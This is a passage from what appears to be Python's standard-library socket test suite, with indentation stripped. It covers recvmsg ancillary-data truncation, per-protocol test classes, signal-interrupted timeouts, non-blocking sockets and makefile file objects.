msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
